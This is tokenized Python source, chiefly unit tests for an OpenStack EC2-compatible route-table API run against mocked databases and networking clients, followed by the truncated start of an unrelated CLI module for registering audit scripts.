set_mock_db_items ( <EOL> tools . purge_dict ( fakes . DB_SUBNET_1 , [ '<STR_LIT>' ] ) ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_2 } , <EOL> '<STR_LIT>' ) <EOL> self . set_mock_db_items ( fakes . DB_VPC_1 ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_1 } , <EOL> '<STR_LIT>' ) <EOL> @ tools . screen_unexpected_exception_logs <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_disassociate_route_table_rollback ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , fakes . DB_ROUTE_TABLE_3 , <EOL> fakes . DB_SUBNET_2 , fakes . DB_VPC_1 ) <EOL> routes_updater . side_effect = Exception ( ) <EOL> self . assert_execution_error ( <EOL> self . ANY_EXECUTE_ERROR , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_3 } ) <EOL> self . db_api . update_item . assert_any_call ( <EOL> mock . ANY , fakes . DB_SUBNET_2 ) <EOL> def test_delete_route_table ( self ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 , fakes . DB_VPC_1 , <EOL> fakes . DB_SUBNET_1 , fakes . DB_SUBNET_2 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> self . assertEqual ( True , resp [ '<STR_LIT>' ] ) <EOL> self . db_api . delete_item . assert_called_once_with ( <EOL> mock . ANY , <EOL> fakes . ID_EC2_ROUTE_TABLE_2 ) <EOL> def test_delete_route_table_invalid_parameters ( self ) : <EOL> self . set_mock_db_items ( ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 } ) <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , fakes . DB_VPC_1 ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 } ) <EOL> subnet = tools . update_dict ( <EOL> fakes . DB_SUBNET_2 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 , fakes . 
DB_VPC_1 , subnet ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> def test_describe_route_tables ( self ) : <EOL> self . set_mock_db_items ( <EOL> fakes . DB_ROUTE_TABLE_1 , fakes . DB_ROUTE_TABLE_2 , <EOL> fakes . DB_ROUTE_TABLE_3 , fakes . DB_SUBNET_1 , fakes . DB_SUBNET_2 , <EOL> fakes . DB_VPC_1 , fakes . DB_VPC_2 , fakes . DB_IGW_1 , fakes . DB_IGW_2 , <EOL> fakes . DB_NETWORK_INTERFACE_1 , fakes . DB_NETWORK_INTERFACE_2 , <EOL> fakes . DB_INSTANCE_1 , fakes . DB_VPN_GATEWAY_1 , <EOL> fakes . DB_VPN_CONNECTION_1 ) <EOL> self . nova . servers . get . return_value = ( <EOL> mock . NonCallableMock ( status = '<STR_LIT>' ) ) <EOL> resp = self . execute ( '<STR_LIT>' , { } ) <EOL> self . assertThat ( resp [ '<STR_LIT>' ] , <EOL> matchers . ListMatches ( [ fakes . EC2_ROUTE_TABLE_1 , <EOL> fakes . EC2_ROUTE_TABLE_2 , <EOL> fakes . EC2_ROUTE_TABLE_3 ] , <EOL> orderless_lists = True ) ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 } ) <EOL> self . assertThat ( resp [ '<STR_LIT>' ] , <EOL> matchers . ListMatches ( [ fakes . EC2_ROUTE_TABLE_1 ] ) ) <EOL> self . db_api . get_items_by_ids . assert_called_once_with ( <EOL> mock . ANY , set ( [ fakes . ID_EC2_ROUTE_TABLE_1 ] ) ) <EOL> self . check_filtering ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , <EOL> fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_1 ) , <EOL> ( '<STR_LIT>' , fakes . ID_EC2_ROUTE_TABLE_1 ) , <EOL> ( '<STR_LIT>' , fakes . ID_EC2_SUBNET_2 ) , <EOL> ( '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT>' , fakes . ID_EC2_ROUTE_TABLE_1 ) , <EOL> ( '<STR_LIT>' , fakes . CIDR_EXTERNAL_NETWORK ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , fakes . ID_EC2_INSTANCE_1 ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , fakes . ID_EC2_VPC_1 ) ] ) <EOL> self . 
check_tag_support ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> fakes . ID_EC2_ROUTE_TABLE_1 , '<STR_LIT>' ) <EOL> def test_describe_route_tables_variations ( self ) : <EOL> igw_1 = tools . purge_dict ( fakes . DB_IGW_1 , ( '<STR_LIT>' , ) ) <EOL> igw_2 = tools . update_dict ( fakes . DB_IGW_2 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPC_2 } ) <EOL> subnet_1 = tools . update_dict ( <EOL> fakes . DB_SUBNET_1 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 } ) <EOL> subnet_2 = tools . update_dict ( <EOL> fakes . DB_SUBNET_2 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> route_table_1 = copy . deepcopy ( fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table_1 [ '<STR_LIT>' ] . append ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_2 } ) <EOL> route_table_1 [ '<STR_LIT>' ] . append ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_1 } ) <EOL> deleted_eni_id = fakes . random_ec2_id ( '<STR_LIT>' ) <EOL> route_table_1 [ '<STR_LIT>' ] . append ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : deleted_eni_id } ) <EOL> route_table_2 = copy . deepcopy ( fakes . DB_ROUTE_TABLE_2 ) <EOL> route_table_2 [ '<STR_LIT>' ] . append ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_2 } ) <EOL> route_table_2 [ '<STR_LIT>' ] . append ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } ) <EOL> route_table_2 [ '<STR_LIT>' ] . append ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } ) <EOL> self . set_mock_db_items ( <EOL> route_table_1 , route_table_2 , fakes . DB_VPC_1 , fakes . DB_VPC_2 , <EOL> igw_1 , igw_2 , subnet_1 , subnet_2 , <EOL> fakes . DB_NETWORK_INTERFACE_1 , fakes . DB_NETWORK_INTERFACE_2 , <EOL> fakes . DB_VPN_GATEWAY_2 ) <EOL> self . nova . servers . get . return_value = ( <EOL> mock . NonCallableMock ( status = '<STR_LIT>' ) ) <EOL> resp = self . 
execute ( '<STR_LIT>' , { } ) <EOL> ec2_route_table_1 = copy . deepcopy ( fakes . EC2_ROUTE_TABLE_1 ) <EOL> ec2_route_table_1 [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_2 , <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ec2_route_table_1 [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_1 , <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ec2_route_table_1 [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : deleted_eni_id , <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ec2_route_table_1 [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : <EOL> fakes . ID_EC2_SUBNET_1 . replace ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_SUBNET_1 , <EOL> '<STR_LIT>' : False } ) <EOL> ec2_route_table_2 = copy . deepcopy ( fakes . EC2_ROUTE_TABLE_2 ) <EOL> ec2_route_table_2 [ '<STR_LIT>' ] [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] = '<STR_LIT>' <EOL> del ec2_route_table_2 [ '<STR_LIT>' ] [ <NUM_LIT:2> ] <EOL> ec2_route_table_2 [ '<STR_LIT>' ] [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] = '<STR_LIT>' <EOL> ec2_route_table_2 [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_2 , <EOL> '<STR_LIT>' : fakes . ID_EC2_INSTANCE_1 , <EOL> '<STR_LIT>' : fakes . ID_OS_PROJECT , <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ec2_route_table_2 [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 , <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ec2_route_table_2 [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . 
ID_EC2_VPN_GATEWAY_2 , <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ec2_route_table_2 [ '<STR_LIT>' ] = [ { <EOL> '<STR_LIT>' : <EOL> fakes . ID_EC2_SUBNET_2 . replace ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . ID_EC2_SUBNET_2 , <EOL> '<STR_LIT>' : False } ] <EOL> self . assertThat ( resp [ '<STR_LIT>' ] , <EOL> matchers . ListMatches ( [ ec2_route_table_1 , <EOL> ec2_route_table_2 ] ) ) <EOL> def test_format_route_table ( self ) : <EOL> id_db_ec2_vpn_gateway_3 = fakes . random_ec2_id ( '<STR_LIT>' ) <EOL> db_route_table_1 = tools . update_dict ( <EOL> fakes . DB_ROUTE_TABLE_1 , <EOL> { '<STR_LIT>' : [ fakes . ID_EC2_VPN_GATEWAY_1 , <EOL> fakes . ID_EC2_VPN_GATEWAY_2 , <EOL> id_db_ec2_vpn_gateway_3 ] } ) <EOL> db_route_table_1 [ '<STR_LIT>' ] . extend ( <EOL> [ { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 , <EOL> '<STR_LIT>' : fakes . CIDR_VPN_1_STATIC } , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' } ] ) <EOL> vpn_connection_3 = tools . update_dict ( <EOL> fakes . DB_VPN_CONNECTION_1 , <EOL> { '<STR_LIT>' : fakes . random_ec2_id ( '<STR_LIT>' ) } ) <EOL> vpn_connection_3 [ '<STR_LIT>' ] . append ( '<STR_LIT>' ) <EOL> ec2_route_table_1 = tools . patch_dict ( <EOL> fakes . EC2_ROUTE_TABLE_1 , <EOL> { '<STR_LIT>' : [ { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } , <EOL> { '<STR_LIT>' : id_db_ec2_vpn_gateway_3 } ] } , <EOL> ( '<STR_LIT>' , ) ) <EOL> ec2_route_table_1 [ '<STR_LIT>' ] . extend ( <EOL> [ { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 , <EOL> '<STR_LIT>' : fakes . CIDR_VPN_1_STATIC , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:state>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:state>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : fakes . 
ID_EC2_VPN_GATEWAY_1 , <EOL> '<STR_LIT>' : fakes . CIDR_VPN_1_PROPAGATED_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:state>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:state>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 , <EOL> '<STR_LIT>' : fakes . CIDR_VPN_2_PROPAGATED_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:state>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 , <EOL> '<STR_LIT>' : fakes . CIDR_VPN_2_PROPAGATED_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:state>' : '<STR_LIT>' } ] ) <EOL> self . assertThat ( <EOL> route_table_api . _format_route_table ( <EOL> base . create_context ( ) , db_route_table_1 , <EOL> gateways = { gw [ '<STR_LIT:id>' ] : gw <EOL> for gw in ( fakes . DB_VPN_GATEWAY_1 , <EOL> fakes . DB_VPN_GATEWAY_2 , <EOL> fakes . DB_IGW_1 ) } , <EOL> vpn_connections_by_gateway_id = { <EOL> fakes . ID_EC2_VPN_GATEWAY_1 : [ fakes . DB_VPN_CONNECTION_1 , <EOL> vpn_connection_3 ] , <EOL> fakes . ID_EC2_VPN_GATEWAY_2 : [ fakes . DB_VPN_CONNECTION_2 ] } ) , <EOL> matchers . DictMatches ( ec2_route_table_1 , orderless_lists = True ) , <EOL> verbose = True ) <EOL> def test_get_subnet_host_routes_and_gateway_ip ( self ) : <EOL> self . set_mock_db_items ( <EOL> fakes . DB_NETWORK_INTERFACE_1 , fakes . DB_NETWORK_INTERFACE_2 , <EOL> fakes . DB_IGW_1 , fakes . DB_VPN_GATEWAY_1 , fakes . DB_VPN_GATEWAY_2 , <EOL> fakes . DB_VPN_CONNECTION_1 ) <EOL> route_table_1 = copy . deepcopy ( fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table_1 [ '<STR_LIT>' ] . extend ( [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . 
random_ec2_id ( '<STR_LIT>' ) } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . random_ec2_id ( '<STR_LIT>' ) } ] ) <EOL> host_routes , gateway_ip = ( <EOL> route_table_api . _get_subnet_host_routes_and_gateway_ip ( <EOL> mock . ANY , route_table_1 , fakes . CIDR_SUBNET_1 ) ) <EOL> self . assertThat ( host_routes , <EOL> matchers . ListMatches ( [ <EOL> { '<STR_LIT>' : fakes . CIDR_VPC_1 , <EOL> '<STR_LIT>' : fakes . IP_GATEWAY_SUBNET_1 } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . IP_GATEWAY_SUBNET_1 } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:127.0.0.1>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:127.0.0.1>' } ] ) ) <EOL> self . assertEqual ( None , gateway_ip ) <EOL> host_routes , gateway_ip = ( <EOL> route_table_api . _get_subnet_host_routes_and_gateway_ip ( <EOL> mock . ANY , fakes . DB_ROUTE_TABLE_2 , fakes . CIDR_SUBNET_1 ) ) <EOL> self . assertEqual ( fakes . IP_GATEWAY_SUBNET_1 , gateway_ip ) <EOL> self . assertThat ( host_routes , <EOL> matchers . ListMatches ( [ <EOL> { '<STR_LIT>' : fakes . CIDR_VPC_1 , <EOL> '<STR_LIT>' : fakes . IP_GATEWAY_SUBNET_1 } , <EOL> { '<STR_LIT>' : fakes . CIDR_EXTERNAL_NETWORK , <EOL> '<STR_LIT>' : fakes . IP_NETWORK_INTERFACE_2 } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . IP_GATEWAY_SUBNET_1 } , <EOL> { '<STR_LIT>' : fakes . CIDR_VPN_1_PROPAGATED_1 , <EOL> '<STR_LIT>' : fakes . IP_GATEWAY_SUBNET_1 } ] ) ) <EOL> self . assertEqual ( fakes . IP_GATEWAY_SUBNET_1 , gateway_ip ) <EOL> @ mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_host_routes ( self , destinations_getter , routes_getter ) : <EOL> self . neutron . show_subnet . side_effect = tools . get_by_1st_arg_getter ( <EOL> { fakes . ID_OS_SUBNET_1 : { '<STR_LIT>' : fakes . OS_SUBNET_1 } , <EOL> fakes . ID_OS_SUBNET_2 : { '<STR_LIT>' : fakes . OS_SUBNET_2 } } ) <EOL> routes_getter . 
side_effect = [ <EOL> ( '<STR_LIT>' , fakes . IP_GATEWAY_SUBNET_1 ) , <EOL> ( '<STR_LIT>' , None ) ] <EOL> destinations_getter . return_value = { '<STR_LIT>' : '<STR_LIT>' } <EOL> route_table_api . _update_host_routes ( <EOL> base . create_context ( ) , self . neutron , common . OnCrashCleaner ( ) , <EOL> fakes . DB_ROUTE_TABLE_1 , [ fakes . DB_SUBNET_1 , fakes . DB_SUBNET_2 ] ) <EOL> destinations_getter . assert_called_once_with ( <EOL> mock . ANY , fakes . DB_ROUTE_TABLE_1 ) <EOL> self . assertEqual ( <NUM_LIT:2> , routes_getter . call_count ) <EOL> routes_getter . assert_any_call ( <EOL> mock . ANY , fakes . DB_ROUTE_TABLE_1 , fakes . CIDR_SUBNET_1 , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> routes_getter . assert_any_call ( <EOL> mock . ANY , fakes . DB_ROUTE_TABLE_1 , fakes . CIDR_SUBNET_2 , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( <NUM_LIT:2> , self . neutron . update_subnet . call_count ) <EOL> self . neutron . update_subnet . assert_any_call ( <EOL> fakes . ID_OS_SUBNET_1 , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . IP_GATEWAY_SUBNET_1 } } ) <EOL> self . neutron . update_subnet . assert_any_call ( <EOL> fakes . ID_OS_SUBNET_2 , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None } } ) <EOL> self . neutron . reset_mock ( ) <EOL> routes_getter . side_effect = None <EOL> routes_getter . return_value = ( '<STR_LIT>' , fakes . IP_GATEWAY_SUBNET_2 ) <EOL> try : <EOL> with common . OnCrashCleaner ( ) as cleaner : <EOL> route_table_api . _update_host_routes ( <EOL> base . create_context ( ) , self . neutron , cleaner , <EOL> fakes . DB_ROUTE_TABLE_1 , [ fakes . DB_SUBNET_1 ] ) <EOL> raise Exception ( '<STR_LIT>' ) <EOL> except Exception as ex : <EOL> if str ( ex ) != '<STR_LIT>' : <EOL> raise <EOL> self . neutron . update_subnet . assert_any_call ( <EOL> fakes . ID_OS_SUBNET_1 , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : fakes . 
OS_SUBNET_1 [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : fakes . IP_GATEWAY_SUBNET_1 } } ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_routes_in_associated_subnets ( self , routes_updater , <EOL> update_vpn_routes ) : <EOL> subnet_default_rtb = { '<STR_LIT:id>' : fakes . random_ec2_id ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPC_1 } <EOL> subnet_rtb_1 = { '<STR_LIT:id>' : fakes . random_ec2_id ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPC_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 } <EOL> subnet_rtb_2 = { '<STR_LIT:id>' : fakes . random_ec2_id ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPC_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } <EOL> subnet_vpc_2 = { '<STR_LIT:id>' : fakes . random_ec2_id ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPC_2 } <EOL> self . set_mock_db_items ( subnet_default_rtb , subnet_rtb_1 , subnet_rtb_2 , <EOL> subnet_vpc_2 , fakes . DB_VPC_1 ) <EOL> def do_check ( rtb , subnets , default_associations_only = None , <EOL> host_only = None ) : <EOL> self . db_api . reset_mock ( ) <EOL> routes_updater . reset_mock ( ) <EOL> update_vpn_routes . reset_mock ( ) <EOL> route_table_api . _update_routes_in_associated_subnets ( <EOL> base . create_context ( ) , '<STR_LIT>' , rtb , <EOL> default_associations_only = default_associations_only , <EOL> update_target = ( route_table_api . HOST_TARGET <EOL> if host_only else <EOL> None ) ) <EOL> self . db_api . get_items . assert_any_call ( <EOL> mock . ANY , '<STR_LIT>' ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , self . neutron , '<STR_LIT>' , rtb , subnets ) <EOL> if host_only : <EOL> self . assertFalse ( update_vpn_routes . called ) <EOL> else : <EOL> update_vpn_routes . assert_called_once_with ( <EOL> mock . ANY , self . neutron , '<STR_LIT>' , rtb , subnets ) <EOL> do_check ( fakes . DB_ROUTE_TABLE_2 , [ subnet_rtb_2 ] , host_only = True ) <EOL> self . db_api . 
get_item_by_id . assert_called_once_with ( <EOL> mock . ANY , fakes . ID_EC2_VPC_1 ) <EOL> do_check ( fakes . DB_ROUTE_TABLE_1 , [ subnet_default_rtb , subnet_rtb_1 ] ) <EOL> self . db_api . get_item_by_id . assert_called_once_with ( <EOL> mock . ANY , fakes . ID_EC2_VPC_1 ) <EOL> do_check ( fakes . DB_ROUTE_TABLE_1 , [ subnet_default_rtb ] , <EOL> default_associations_only = True ) <EOL> self . assertFalse ( self . db_api . get_item_by_id . called ) <EOL> routes_updater . reset_mock ( ) <EOL> update_vpn_routes . reset_mock ( ) <EOL> route_table_api . _update_routes_in_associated_subnets ( <EOL> mock . MagicMock ( ) , '<STR_LIT>' , fakes . DB_ROUTE_TABLE_1 , <EOL> update_target = route_table_api . VPN_TARGET ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , self . neutron , '<STR_LIT>' , <EOL> fakes . DB_ROUTE_TABLE_1 , [ subnet_default_rtb , subnet_rtb_1 ] ) <EOL> update_vpn_routes . assert_called_once_with ( <EOL> mock . ANY , self . neutron , '<STR_LIT>' , <EOL> fakes . DB_ROUTE_TABLE_1 , [ subnet_default_rtb , subnet_rtb_1 ] ) <EOL> def test_get_router_destinations ( self ) : <EOL> self . set_mock_db_items ( fakes . DB_IGW_1 , fakes . DB_NETWORK_INTERFACE_2 ) <EOL> route_table_2 = copy . deepcopy ( fakes . DB_ROUTE_TABLE_2 ) <EOL> fake_igw_id = fakes . random_ec2_id ( '<STR_LIT>' ) <EOL> fake_vgw_id = fakes . random_ec2_id ( '<STR_LIT>' ) <EOL> fake_eni_id = fakes . random_ec2_id ( '<STR_LIT>' ) <EOL> route_table_2 [ '<STR_LIT>' ] . extend ( [ <EOL> { '<STR_LIT>' : fake_igw_id , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : fake_vgw_id , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : fake_eni_id , <EOL> '<STR_LIT>' : '<STR_LIT>' } ] ) <EOL> host_routes = route_table_api . _get_active_route_destinations ( <EOL> '<STR_LIT>' , route_table_2 ) <EOL> self . assertThat ( host_routes , matchers . DictMatches ( { <EOL> fakes . ID_EC2_IGW_1 : fakes . DB_IGW_1 , <EOL> fakes . ID_EC2_NETWORK_INTERFACE_2 : <EOL> fakes . 
DB_NETWORK_INTERFACE_2 } ) ) <EOL> self . db_api . get_items_by_ids . assert_called_once_with ( <EOL> mock . ANY , [ fakes . ID_EC2_NETWORK_INTERFACE_2 , fakes . ID_EC2_IGW_1 , <EOL> fake_igw_id , fake_vgw_id , fake_eni_id , <EOL> fakes . ID_EC2_VPN_GATEWAY_1 ] ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_subnet_routes ( self , host_routes_updater , <EOL> update_vpn_routes ) : <EOL> route_table_api . _update_subnet_routes ( <EOL> base . create_context ( ) , '<STR_LIT>' , fakes . DB_SUBNET_1 , <EOL> fakes . DB_ROUTE_TABLE_1 ) <EOL> host_routes_updater . assert_called_once_with ( <EOL> mock . ANY , self . neutron , '<STR_LIT>' , fakes . DB_ROUTE_TABLE_1 , <EOL> [ fakes . DB_SUBNET_1 ] ) <EOL> update_vpn_routes . assert_called_once_with ( <EOL> mock . ANY , self . neutron , '<STR_LIT>' , fakes . DB_ROUTE_TABLE_1 , <EOL> [ fakes . DB_SUBNET_1 ] ) <EOL> class RouteTableValidatorTestCase ( test_base . BaseTestCase ) : <EOL> def test_validate_igw_or_vgw_id ( self ) : <EOL> validator = route_table_api . Validator ( ) <EOL> validator . igw_or_vgw_id ( fakes . random_ec2_id ( '<STR_LIT>' ) ) <EOL> validator . igw_or_vgw_id ( fakes . random_ec2_id ( '<STR_LIT>' ) ) <EOL> invalid_ids = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> fakes . random_ec2_id ( '<STR_LIT>' ) , fakes . random_ec2_id ( '<STR_LIT:i>' ) , <EOL> fakes . random_ec2_id ( '<STR_LIT>' ) , fakes . random_ec2_id ( '<STR_LIT>' ) ] <EOL> for id in invalid_ids : <EOL> self . assertRaises ( exception . InvalidParameterValue , <EOL> validator . igw_or_vgw_id , id ) </s>
<s> import argparse <EOL> import logging <EOL> import os <EOL> import tempfile <EOL> from engine import Engine <EOL> from entropy import utils <EOL> LOG = logging . getLogger ( __name__ ) <EOL> engine_cfg = os . path . join ( tempfile . gettempdir ( ) , '<STR_LIT>' ) <EOL> def _get_backend_from_engine ( engine ) : <EOL> try : <EOL> engine_config = dict ( utils . load_yaml ( engine_cfg ) ) [ engine ] <EOL> this_engine_cfg_file = engine_config [ '<STR_LIT>' ] <EOL> this_engine_cfg = dict ( utils . load_yaml ( this_engine_cfg_file ) ) <EOL> return Engine . get_backend ( this_engine_cfg [ engine ] [ '<STR_LIT>' ] , <EOL> this_engine_cfg [ engine ] ) <EOL> except KeyError : <EOL> LOG . exception ( "<STR_LIT>" ) <EOL> def _add_to_list ( engine , script_type , script_name , ** script_args ) : <EOL> backend = _get_backend_from_engine ( engine ) <EOL> if backend . check_script_exists ( script_type , script_name ) : <EOL> LOG . error ( '<STR_LIT>' , script_type ) <EOL> return False <EOL> try : <EOL> data = { <EOL> script_name : script_args <EOL> } <EOL> backend . add_script ( script_type , data ) <EOL> return True <EOL> except KeyError : <EOL> LOG . exception ( "<STR_LIT>" , script_type , script_name ) <EOL> except Exception : <EOL> LOG . exception ( "<STR_LIT>" , script_type , <EOL> script_name ) <EOL> return False <EOL> def _remove_from_list ( engine , script_type , script_name ) : <EOL> backend = _get_backend_from_engine ( engine ) <EOL> try : <EOL> backend . remove_script ( script_type , script_name ) <EOL> except Exception : <EOL> LOG . exception ( "<STR_LIT>" , <EOL> script_type , script_name ) <EOL> def register_audit ( args ) : <EOL> LOG . info ( '<STR_LIT>' , args . name ) <EOL> if not ( args . conf and args . name and args . engine ) : <EOL> LOG . error ( '<STR_LIT>' ) <EOL> return <EOL> audit_cfg_args = { 